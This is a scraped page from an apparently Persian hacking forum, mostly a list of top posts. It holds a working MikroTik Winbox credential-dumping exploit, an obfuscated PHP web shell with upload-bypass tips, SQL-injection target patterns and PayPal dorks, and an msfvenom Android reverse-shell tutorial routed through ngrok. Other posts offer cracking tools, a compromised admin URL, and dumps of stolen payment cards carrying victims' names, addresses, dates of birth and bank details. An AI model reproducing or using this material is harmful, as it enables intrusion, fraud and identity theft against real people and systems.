view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= product-range.php?rangeID= en/news/fullnews.php?newsid= deal_coupon.php?cat_id= show.php?id= blog/index.php?idBlog= redaktion/whiteteeth/detail.php?nr= HistoryStore/pages/item.php?itemID= aktuelles/veranstaltungen/detail.php?id= tecdaten/showdetail.php?prodid= ?id= rating/stat.php?id= content.php?id= viewapp.php?id= item.php?id= news/newsitem.php?newsID= FernandFaerie/index.php?c= show.php?id= ?cat= categories.php?cat= category.php?c= product_info.php?id= prod.php?cat= store/product.php?productid= browsepr.php?pr= product-list.php?cid= products.php?cat_id= product.php?ItemID= view-event.php?id= content.php?id= book.php?id= page/venue.php?id= print.php?sid= colourpointeducational/more_details.php?id= print.php?sid= browse/book.php?journalID= section.php?section= bookDetails.php?id= profiles/profile.php?profileid= event.php?id= gallery.php?id= category.php?CID= corporate/newsreleases_more.php?id= print.php?id= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= modules/forum/index.php?topic_id= feature.php?id= products/Blitzball.htm?id= profile_print.php?id= questions.php?questionid= html/scoutnew.php?prodid= main/index.php?action= ********.php?cid= ********.php?cid= news.php?type= index.php?page= viewthread.php?tid= summary.php?PID= news/latest_news.php?cat_id= index.php?cPath= category.php?CID= index.php?pid= more_details.php?id= specials.php?osCsid= search/display.php?BookID= articles.php?id= print.php?sid= page.php?id= more_details.php?id= newsite/pdf_show.php?id= shop/category.php?cat_id= shopcafe-shop-product.php?bookId= shop/books_detail.php?bookID= index.php?cPath= more_details.php?id= news.php?id= more_details.php?id= shop/books_detail.php?bookID= more_details.php?id= blog.php?blog= index.php?pid= prodotti.php?id_cat= category.php?CID= more_details.php?id= poem_list.php?bookID= more_details.php?id= content.php?categoryId= authorDetails.php?bookID= press_release.php?id= item_list.php?cat_id= colourpointeducational/more_details.php?id= index.php?pid= download.php?id= shop/category.php?cat_id= i-know/content.php?page= store/index.php?cat_id= yacht_search/yacht_view.php?pid= pharmaxim/category.php?cid= print.php?sid= specials.php?osCsid= store.php?cat_id= category.php?cid= displayrange.php?rangeid= product.php?id= csc/news-details.php?cat= products-display-details.php?prodid= stockists_list.php?area_id= news/newsitem.php?newsID= index.php?pid= newsitem.php?newsid= category.php?id= news/newsitem.php?newsID= details.php?prodId= publications/publication.php?id= purelydiamond/products/category.php?cat= category.php?cid= product/detail.php?id= news/newsitem.php?newsID= details.php?prodID= item.php?item_id= edition.php?area_id= page.php?area_id= view_newsletter.php?id= feedback.php?title= freedownload.php?bookid= fullDisplay.php?item= getbook.php?bookid= GetItems.php?itemid= giftDetail.php?id= help.php?CartId= home.php?id= index.php?cart= index.php?cartID= index.php?ID= info.php?ID= item.php?eid= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item_details.php?catid= item_list.php?maingroup item_show.php?code_no= itemDesc.php?CartId= itemdetail.php?item= itemdetails.php?catalogid= learnmore.php?cartID= links.php?catid= list.php?bookid= List.php?CatID= listcategoriesandproducts.php?idCategory= modline.php?id= myaccount.php?catid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= products.php?type= event.php?id= showfeature.php?id= home.php?ID= tas/event.php?id= profile.php?id= details.php?id= past-event.php?id= index.php?action= site/products.php?prodid= page.php?pId= resources/vulnerabilities_list.php?id= site.php?id= products/index.php?rangeid= global_projects.php?cid= publications/view.php?id= display_page.php?id= pages.php?ID= lmsrecords_cd.php?cdid= product.php?prd= cat/?catid= products/product-list.php?id= debate-detail.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= category.php?c= main.php?id= article.php?id= showproduct.php?productId= view_item.php?item= skunkworks/content.php?id= index.php?id= item_show.php?id= publications.php?Id= index.php?t= view_items.php?id= portafolio/portafolio.php?id= YZboard/view.php?id= index_en.php?ref= index_en.php?ref= category.php?id_category= main.php?id= main.php?id= calendar/event.php?id= default.php?cPath= pages/print.php?id= index.php?pg_t= _news/news.php?id= forum/showProfile.php?id= fr/commande-liste-categorie.php?panier= downloads/shambler.php?id= sinformer/n/imprimer.php?id= More_Details.php?id= directory/contenu.php?id_cat= properties.php?id_cat= forum/showProfile.php?id= downloads/category.php?c= index.php?cat= product_info.php?products_id= product_info.php?products_id= product-list.php?category_id= detail.php?siteid= projects/event.php?id= view_items.php?id= more_details.php?id= melbourne_details.php?id= more_details.php?id= detail.php?id= more_details.php?id= home.php?cat= idlechat/message.php?id= detail.php?id= print.php?sid= more_details.php?id= default.php?cPath= events/event.php?id= brand.php?id= toynbeestudios/content.php?id= show-book.php?id= more_details.php?id= store/default.php?cPath= property.php?id= product_details.php?id= more_details.php?id= product.php?shopprodid= product.php?productid= product.php?product= product.php?product_id= productlist.php?id= product.php?shopprodid= garden_equipment/pest-weed-control/product.php?pr= product.php?shopprodid= browsepr.php?pr= productlist.php?id= kshop/product.php?productid= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= products.php?categoryID= ?pid= bookpage.php?id= view_items.php?id= index.php?pagina= product.php?prodid= notify/notify_form.php?topic_id= php/index.php?id= content.php?cid= product.php?product_id= constructies/product.php?id= detail.php?id= php/index.php?id= index.php?section= product.php?****= show_bug.cgi?id= detail.php?id= bookpage.php?id= product.php?id= today.php?eventid= main.php?item= index.php?cPath= news.php?id= event.php?id= print.php?sid= news/news.php?id= module/range/dutch_windmill_collection.php?rangeId= print.php?sid= show_bug.cgi?id= product_details.php?product_id= products.php?groupid= projdetails.php?id= product.php?productid= products.php?catid= product.php?product_id= product.php?prodid= product.php?prodid= newsitem.php?newsID= newsitem.php?newsid= profile.php?id= ********s_in_area.php?area_id= productlist.php?id= productsview.php?proid= rss.php?cat= pub/pds/pds_view.php?start= products.php?rub= ogloszenia/rss.php?cat= print.php?sid= product.php?id= print.php?sid= magazin.php?cid= galerie.php?cid= www/index.php?page= view.php?id= content.php?id= board/read.php?tid= product.php?id_h= news.php?id= index.php?book= products.php?act= reply.php?id= isplay.php?ID= display.php?ID= ponuky/item_show.php?ID= default.php?cPath= main/magpreview.php?id= ***zine/board.php?board= content.php?arti_id= mall/more.php?ProdID= product.php?cat= news.php?id= content/view.php?id= content.php?id= index.php?action= board_view.php?s_board_id= KM/BOARD/readboard.php?id= board_view.html?id= content.php?cont_title= category.php?catid= mall/more.php?ProdID= publications.php?id= irbeautina/product_detail.php?product_id= print.php?sid= index_en.php?id= bid/topic.php?TopicID= news_content.php?CategoryID= front/bin/forumview.phtml?bbcode= cat.php?cat_id= stat.php?id= veranstaltungen/detail.php?id= more_details.php?id= english/print.php?id= print.php?id= view_item.php?id= content/conference_register.php?ID= rss/event.php?id= event.php?id= main.php?id= rtfe.php?siteid= category.php?cid= classifieds/detail.php?siteid= tools/print.php?id= channel/channel-layout.php?objId= content.php?id= resources/detail.php?id= more_details.php?id= detail.php?id= view_items.php?id= content/programme.php?ID= detail.php?id= default.php?cPath= more_details.php?id= content.php?id= view_items.php?id= default.php?cPath= book.php?id= view_items.php?id= products/parts/detail.php?id= category.php?cid= book.html?isbn= view_item.php?id= picgallery/category.php?cid= detail.php?id= print.php?sid= displayArticleB.php?id= knowledge_base/detail.php?id= bpac/calendar/event.php?id= mb_showtopic.php?topic_id= pages.php?id= content.php?id= exhibition_overview.php?id= singer/detail.php?siteid= Category.php?cid= detail.php?id= print.php?sid= category.php?cid= more_detail.php?X_EID= book.php?ISBN= view_items.php?id= category.php?cid= htmlpage.php?id= story.php?id= tools/print.php?id= print.php?sid= php/event.php?id= print.php?sid= articlecategory.php?id= print.php?sid= ibp.php?ISBN= club.php?cid= view_items.php?id= aboutchiangmai/details.php?id= view_items.php?id= book.php?isbn= blog_detail.php?id= event.php?id= default.php?cPath= product_info.php?products_id= shop_display_products.php?cat_id= print.php?sid= modules/content/index.php?id= printcards.php?ID= events/event.php?ID= more_details.php?id= default.php?TID= general.php?id= detail.php?id= event.php?id= referral/detail.php?siteid= view_items.php?id= event.php?id= view_items.php?id= category.php?id= cemetery.php?id= index.php?cid= content.php?id= exhibitions/detail.php?id=
  24. 2 امتیاز

    نگارش 1.0.0

    37 دریافت

    در این سند به معرفی سپر ایمنی گوگل پلی ، مراحلی که برای دورزدن ( تشخیص ورودی های ناامن ) در سپر محافظتی گوگل پلی به کار گرفته شده میپردازیم ، آزمایش های زیادی روی سپر ایمنی گوگل پلی صورت گرفته است ( تغییر امضا – افزیش و کاهش حجم بسته نصبی - بایند کردن بسته نصبی – دریافت خروجی جدید از بسته مخرب و . . . ) اما ، ما قصد داریم که در این سند به دورزدن مکانیزم شناسایی برنامه های مخرب توسط سپر ایمنی گوگل پلی با یک روش فوق العاده ساده بپردازیم ! نویسنده : آرین چهرقانی تاریخ انتشار : ۱۴۰۰/۰۸/۰۳
  25. 2 امتیاز
    پلاگین شل آپلودر جهت آپلود کردن شل در پنل وردپرس افزونه رو نصب و فعال میکنید، از طریق منو وارد پلاگین میشید نوع شل خودتون رو انتخاب و آپلود میکنید. پلاگین به صورت فایل ZIP پیوست شد. shell_uploader.zip
  26. 2 امتیاز
    دورد DOrk # Dork: inurl:"/wp-content/plugins/wp-shopping-cart/" # Dork: inurl:cart.php?m=features&id= # Dork: filetype:log inurl:paypal # Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro # Dork: inurl:"paypal.log" ext:log # Dork: inurl:"paypal" intitle:"index of" backup | db | access -github # Dork: intitle:"index of" inurl:"paypal" log # Dork: inurl:inc_paypalstoremanager.asp # Dork: "Powered by DUpaypal" -site:duware.com # Dork: intext:OpenCart inurl:index.php?route=common/dashboard
  27. 2 امتیاز
    DONGLE!.part2.rar DONGLE!.part3.rar DONGLE!.part4.rar DONGLE!.part5.rar
  28. 2 امتیاز
    به نام خدا با سلام خدمت دوستان . #!/usr/bin/env python3 import socket import sys from extract_user import dump a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00, 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07, 0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21, 0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66, 0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f, 0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73, 0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00] b = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00, 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01, 0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08, 0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09, 0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00] if __name__ == "__main__": if len(sys.argv) < 2 or (len(sys.argv) == 3 and not str.isdigit(sys.argv[2])) or len(sys.argv) > 3: print("Usage: python3 WinboxExploit.py IP_ADDRESS [PORT]") exit() ip = sys.argv[1] port = 8291 if len(sys.argv) == 3: port = int(sys.argv[2]) #Initialize Socket s = socket.socket() s.settimeout(3) try: s.connect((ip, port)) except Exception as e: print("Connection error: " + str(e)) exit() #Convert to bytearray for manipulation a = bytearray(a) b = bytearray(b) #Send hello and recieve the sesison id s.send(a) try: d = bytearray(s.recv(1024)) except Exception as e: print("Connection error: " + str(e)) exit() #Replace the session id in template b[19] = d[38] #Send the edited response s.send(b) d = bytearray(s.recv(1024)) #Get results print("Connected to " + ip + ":" + str(port)) if len(d[55:]) > 25: print("Exploit successful") dump(d[55:]) else: print("Exploit failed") بحث پابلیکه شده سال 2019 هست اموزش ها توی نت هست :دی
  29. 2 امتیاز
    با سلام خدمت دوستان عزیز انجمن ایران سایبر پس از 1 ماه غیرفعال بودن مجددا راه اندازی گردید و با توجه به تغییراتی که در مالکیت و انجمن صورت گرفته است لازم است یک سری توضیحات جهت مشخص کردن محور فعالیت انجمن اعلام نمایم. 1- مالکیت و فعالیت دامین و سایت تغییر کرده است و زین پس در حوزه امنیت - آموزش امنیت و شبکه - ارزیابی امنیت فعالیت مینماید. 2- هرگونه نفوذ به وبسایت های داخلی و خارجی خلاف قوانین بوده و در صورت مشاهده کاربر خاطی از سایت اخراج شده و مسئولیت هرگونه تخلف بر عهده شخص میباشد نه وبسایت . 3- هرگونه بی احترامی و توهین چه به اشخاص داخلی و خارجی ممنوع بوده و مسئولیت احتمالی برعهده شخص میباشد. 4- انجام هرگونه فعالیت سیاسی کاملا ممنوع میباشد. *** از این تاریخ ( 06/05/1400 ) ( 2021 - 28july ) به قبل تمامی مسئولیت فعالیت ها چه داخل سایت و انجمن و چه خارج از سایت و مسائل مربوط به آن مربوط به مدیریت و مالکیت قبل سایت بوده و مدیریت جدید و مالک جدید سایت عهده دار مسائل حقوقی و ... نمیباشد. با تشکر .
  30. 2 امتیاز
    با سلام میتونید از این برنامه استفاده کنید dvd-unlocker.zip
  31. 1 امتیاز
    درود خدمت دوستان عزیز شما در اینجا نشانگرهای قفل درها و نشانگرهای چراغ راهنما و یک پنل کنترلی دارید . که به کاربر اجازه می دهد با شبکه خودرو شبیه سازی شده تعامل داشته باشد، شتاب را اعمال کند و قفل درب و چراغ راهنما را کنترل کند. ICSim به سایر ابزارهای رایگان لینوکس، از جمله CAN Utilities یا can-utils که در مخازن نصب بسته برای اکثر توزیع‌های لینوکس در دسترس هستند، متکی است. در بخش بعدی، نصب و پیکربندی گام به گام نرم افزار ICSim و ابزارهای مرتبط را برای استفاده در کلاس درس، آزمایشگاه کامپیوتر یا ایستگاه کاری تحقیقاتی خودرو و همچنین اجرا در یک ماشین مجازی در ویندوز کالا توضیح خواهیم داد. OpenGarages.org نصب نرم افزار پیش نیازی است که به عنوان وابستگی ها شناخته می شود. ابتدا کالی لینوکس را با تایپ دستور به روز رسانی در یک پنجره جدید ترمینال (خط فرمان) به روز کنید: به روز رسانی sudo apt-get کتابخانه های توسعه LibSDL (SDL مخفف Simple DirectMedia Layer، یک کتابخانه توسعه بین پلتفرمی برای گرافیک کامپیوتری و صدا) را نصب کنید. LibSDL توسط نرم افزار Instrument Cluster Simulator از OpenGarages برای ترسیم و متحرک سازی داشبورد مجازی (یا کلاستر ابزار)، و همچنین برای دسترسی به کنترلرهای مختلف بازی، مانند کنترلر پلی استیشن PS3 استفاده می شود. هر دو کتابخانه libsdl2-dev و libsdl2-image-dev را با دستور نصب کنید: sudo apt-get install libsdl2-dev libsdl2-image-dev پس از نصب کتابخانه های LibSDL، ابزارهای CAN را اضافه کنید. CAN مخفف شبکه کنترل‌کننده، شبکه اصلی در خودروهای مدرن است. ابزارهای CAN در برخی از توزیع‌های لینوکس گنجانده شده‌اند، اما تا زمان نوشتن این مقاله در Kali وجود ندارد. ابزارهای CAN را می توان با استفاده از دستور زیر نصب کرد : sudo apt-get install can-utils هنگامی که وابستگی‌های نرم‌افزار ابزارهای LibSDL و CAN برقرار شد، می‌توانیم ابزارهای هک خودرو ICSim را دانلود و نصب کنیم. sh ~/ICSim/setup_vcan.sh با تایپ ifconfig می توانید بررسی کنید که پیوند شبکه vcan0 فعال است . علاوه بر رابط های شبکه معمولی خود، اکنون باید vcan0 را در لیست مشاهده کنید. با فعال بودن پیوند شبکه vcan0 ، می‌توانیم Instrument Cluster Simulator و Control Panel را برای شبیه‌سازی شبکه کنترل‌کننده زنده و خوشه ابزار در یک خودروی مدرن اجرا کنید https://github.com/zombieCraig/ICSim موفق باشید . سوالی بود پ .خ
  32. 1 امتیاز
    وقتی اپلود نشود مشکل شما اپلود شل و انتی شلر نیست یعنی فایل اجرایی اپلود نمیشود روسرور شما میتونی این بایپس ها هم تست کنید php5. phtml. shell.html;.php
  33. 1 امتیاز
    <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_GET[icg];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?> این شل توی یک فایل ذخیره کنید مثلا shell.php فراخونی شل به این صورت که ;site.com/shell.php?icg=echo icg اگر عبارت icg به شما نشون داد یعنی شل با موفقیت اپلود شد اگر به اینصورت اپلود شود میشود باقی مراحل میشود بایپس کرد این تست مربوط به امکان اپلود شدن شل برروی سرور هست
  34. 1 امتیاز
    سلام خسته نباشید ممنون از مطلب خوبتون دراصل این بکدور نیستش ، این ریست پسورد ویندوز هست که فقط رو ویندوز سون هم نیست رو تمام نسخه هایی که دارای Utilman در قسمت User Login ویندوز هستند وجود داره . و من موضوع ایجاد شده رو کامل خوندم متوجه یک سری اشتباهات هم شدم : برای جابه جایی لازم نیست که شما کامند ویندوز رو از مسیر مورد نظر باز کنید ، کافیه بوت انجام بشه و برید توی X-Source Command و با دستور Ren و نه Rename اقدام به جابه جایی این دوتا فایل کنید و حتی رمز رو هم دور بزنید ! در نهایت هم باید بگم بخواید از Insecure File Permissions هم استفاده بکنید یکسری قواعد داره شما اومدید مجوز دادید به فایل ولی آیا این مجوز رو اجازه دارید بدید به فایل ؟ و یا یه همچین چیزی ... اگر خودش از قبل F ACC اون یه چیزه ولی اینکه بیاید بهش دسترسی بدید هم یه چیز که همیشه این اتقاق نمیوفته برای همین هم این دوستمون دسترسی نداره که کاری انجام بده پس دقت کنید 🌹
  35. 1 امتیاز
    ابزاری بسیار قدرتمند در زمینه تست نفوذ وب اپلیکیشن همراه با گزارشات و تعیین سطح آسیب پذیری ها حجم : 250M https://anonfiles.com/5dL6nbi8y8/Netsparker-6.1.0.31760-h0nus_zip
  36. 1 امتیاز
    با سلام و خسته نباشید ؛ وقتتون بخیر دوستان. من چند وقتی هست که دنبال چند مورد از آموزش های اینستگرام هستم و به دنبال اینم که درآمد کسب کنم از این راه ، و جدیداً هم به جد افتادم دنبالش. چند تا سوال داشتم و درواست کمک ( آموزش ) ، شاید بنده خدایانی مثل من تو گوگل سرچ میسزنن و واسشون مفید باشه. درخواست اولم ، در واقع سوال اولم اینه که کرک کردن و دسترسی به پیج اینستگرام شدنی هست یا خیر ؟ در ادامه اگه جواب بله هست ؛ من با Sentry MBA و حالا با کنفیگ و دم و تشکیلاتی که از یه فروم دیگه گرفتم سعی در کرک کردن داشتم اما خب به نتیجه ای نرسیدم. علاقه دارم از ریشه این مسئله رو یاد بگیرم. درخواست دومم اینه که یه آموزشی بابت اینکه امنیت پیج اینستگرام رو تضمین میکنن بر چه اساسی هست رو قرار بدید. به عنوان مثال خیلی از سلبریتی ها پایین پیج هاشون نوشتن تامین امنیت مثلا فلانی ؛ یعنی این دوستان فقط Two step verfication رو فعال میکنن یا اینکه کار دیگه ای انجام میدن ؟ و این چه فرآیندی هست ؟ درخواست سومم راجب اینه که نظرتون راجب پنل افزایش فالوور اینستگرام و لایک اینستگرام چی هستش. ازتون ممنون میشم که حتی شده نظر کوتاهتون رو هم به اشتراک بزارید.
  37. 1 امتیاز
    با عرض سلام! در این تاپیک یوزر و پسورد لیست کشور های مختلف که در کرک VPS رایج هستند را برای شما قرار خواهیم داد. هماهنگ شده با MR.S4JJ4D عزیز موفق باشید /.
  38. 1 امتیاز
    به نام خدا سلام خدمت همه عزیزان و اساتید گرامی. بابت فعالیت کم عذر خواهی میکنم یکم سرم شلوغه انشالله کم کم چیزایی جدیدی که نوشتم یا پیدا کردم رو برای عموم به اسم تیم به اشتراک میزارم خوب بنده با یه بررسی ساده تونستم با یک ترفند حمله مرد میانی رو روی پروکسی های تلگرام اجرا بکنم , زیاد حرف نمیزنم توضیحات در گیت کاملا داده شده با این روش میتونیم به راحتی به آی پی کسایی که به پروکسی متصل هستند دسترسی پیدا کنیم. و خیلی اطلاعات دیگه! عکس از نمونه فضای اجرا شده: توضیحات کامل راجعبه نحوه بهره برداری از این ترفند رو در github میتونید ببینید: https://github.com/0x9a/MTProxy-MITM-PoC
  39. 1 امتیاز
    خب بریم سراغ ادامه آموزش 👊 قبل از شروع ادامه آموزش،به چند سوالی که ممکنه براتون پیش بیاد جواب بدم: سوال اول : آیا میتونم بعد از قطع شدن سرویس بازم از همون پیلود استفاده کنم؟ در حالت عادی این امکان وجود نداره اما با تهیه نسخه vip این سرویس این امکان وجود داره. سوال دوم : آیا ممکنه بعد از وصل شدن Ngrok ممکن است اتصال به سرویس بدون دلیل قطع شود؟خیر،تا زمانی که شما این سرویس را قطع نکنید سرویس مربوطه قطع نخواهد شد. سوال سوم : آیا نیاز به پورت فورواردینگ داریم؟خیر،بالا تر هم توضیح دادم با استفاده از این سرویس دیگه نیازی به پورت فورواردینگ و این داستانا ندارید. و سوال آخر اینکه این سرویس قابل اعتماد است؟ بله، ترافیک اینترنت به صورت کاملا اختصاصی فوروارد میشود و هویت شما مخفی می ماند. 💢 ادامه آموزش هک اندروید خارج از شبکه محلی: راه اندازی سیستم Ngrok: ابتدا شما وارد پوشه ای میشید که ngrok در آنجا نصب است،سپس ترمینال لینوکس را در پوشه مربوطه باز میکنید و دستور زیر را تایپ میکنید: ngrok tcp 4444/. با نوشتن این دستور،سرویس ngrok در پورت 4444 برای شما باز میشود. حالا نوبت ساخت پیلود اندرویدی میرسه. دوباره ترمینال لینوکس را باز کرده و دستور زیر را تایپ کنید: msfvenom -p android/meterpreter/reverse_tcp LHOST=Forwarding LPORT=Forwarding R > Desktop/rat.apk در کد بالا شما باید قسمت lhost آدرس هاستی که در قسمت forwarding نوشته شده است را وارد کنید،در قسمت lport همچنین باید پورتی که در قسمت forwarding نوشته شده است را وارد کنید. بعد از وارد کردن دستور بالا،پیلود اندرویدی برای شما در آدرس مورد نظر ساخته میشود. حالا زمان ست کردن lhost و lport میرسه(این قسمت خیلی مهمه!!) در قسمت ست کردن lhost و lport باید دستورات زیر را وارد کنید تا پیلود دقیق ست شود: set LHOET webinterface set LPORT localhost در قسمت اول (set lhost)،lhost مورد نظر قسمت interface نوشته شده که شما باید بدون وارد کردن http آن را وارد و ست کنید. در قسمت دوم(lport)،lport مورد نظر قسمت localhost نوشته شده است که همان پورتی است که در بالاتر وارد کردیم(4444) بعد از ست کردن،با دستور expliot پیلود ما ران میشود و آماده فرستادن به تارگت...! با این سرویس تونستیم تارگت اندرویدی را خارج از شبکه محلی هک کنیم...!
  40. 1 امتیاز
    ~ tilde ` back quote ‘ quotation “ double quotation ! exclamation point @ at # sharp, Number Sign $ dollar Sign % percent ^ concatenation, AND & ampersand * star, asterisk ( open parenthesis ) close parenthesis - dash, hyphen _ underline, under Score + plus, addition = equals | pipe / forward slash \ back slash ? question mark . dot, period, : colon ; semi-colon < Less Than = LT > Greater Than = GT , comma {} braces [] bracket
  41. 1 امتیاز
    ببخشید سلام . اینم فکر کن بدرد مرحله اول کار بخوره ایا با این تفسیر چنین کاریو میتونم انجام بدم ؟
  42. 1 امتیاز
    با سلام و احترام به عزیزان تیم Bitcoin Wallet Pass Finder به کمک این برنامه و ( کمبولیست , فرام ورک و DLL ) میتونین به راحتی پسور های خود را کرک کنید یا کلینت انجام بدید . BTC_PassCrack_140207_en.zip
  43. 1 امتیاز
    با سلام ، متاسفانع الان میبینم حرف شما کاملا درسته ، در اولین فرصت جلیگزین میکنم ، بنده فقط تست نکردم چیزی که به دستم رسیده بود ،
  44. 1 امتیاز
    http://www.maionesrl.com/public/admin.php?option&path=D:/inetpub/webs/maionesrlcom
  45. 1 امتیاز
  46. 1 امتیاز
    4658581064036011|032022|633|C Francke |58 New Road, Ditton|Aylesford|ME20 6AD|GB|07825718303 DOB: 30/01/1969 MMN: Nicholas Full Name: Catherine Francke Account Number: 60362859 Sort Code: 205412 IP: 86.18.184.156 Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G960F/G960FXXU7DTAA) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/11.1 Chrome/75.0.3770.143 Mobile Safari/537.36 ----------- 4319356146919497 06/20 345 Anita Lonergan Rochesto ------------ 4815807348316642|02|2024|989 ----------- 4658582835294137|122021|516|S P Balachandran|33. Hadrian avenue, Dunstable|Bedfordshire|LU54SW|GB|07405551533 DOB: 05/06/1951 MMN: Nasamani Full Name: Seevaratnam Princely Balachandran Account Number: 60736902 Sort Code: 203716 IP: 84.13.51.142 Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
  47. 1 امتیاز
